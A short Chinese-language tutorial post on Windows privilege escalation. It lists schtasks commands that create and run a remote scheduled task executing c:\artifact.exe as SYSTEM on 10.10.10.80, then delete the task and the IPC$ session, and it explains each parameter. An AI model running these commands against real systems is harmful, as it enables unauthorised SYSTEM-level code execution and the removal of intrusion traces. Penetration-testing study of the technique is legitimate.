1. 程式人生 > WINDOWS開發 >windows提權

windows提權

schtasks命令使用

schtasks命令比at命令更靈活。而且在Windows Vista、Windows Server 2008及之後版本的作業系統已經棄用at命令。
建立一個名稱為"test"的計劃任務,啟動許可權為system

schtasks /create /s 10.10.10.80 /tn test /sc onstart /tr c:\artifact.exe /ru system /f

在遠端主機執行“test”任務

schtasks /run /s 10.10.10.80 /i /tn "test"

技術分享圖片

執行完成之後就刪除計劃任務

schtasks /delete /s 10.10.10.80
/tn "test" /f

技術分享圖片

接著刪除IPC$

net use  \\10.10.10.80 /del /y

技術分享圖片

在使用schtasks命令的時候會在系統留下日誌檔案C:WindowsTasksSchedLgU.txt。

引數的意思:

    /create 表示建立計劃任務

    /tn  表示任務名

    /tr  指定執行的檔案

    /sc  是任務執行頻率

    /st  是執行時間

    /s  指定遠端機器名或 ip 地址

    /ru 指定執行任務的使用者許可權,這裡指定為最高的 SYSTEM

    /i  表示立即執行

    /F  表示如果指定的任務已經存在,則強制建立任務並抑制警告

    
/delete 是刪除任務。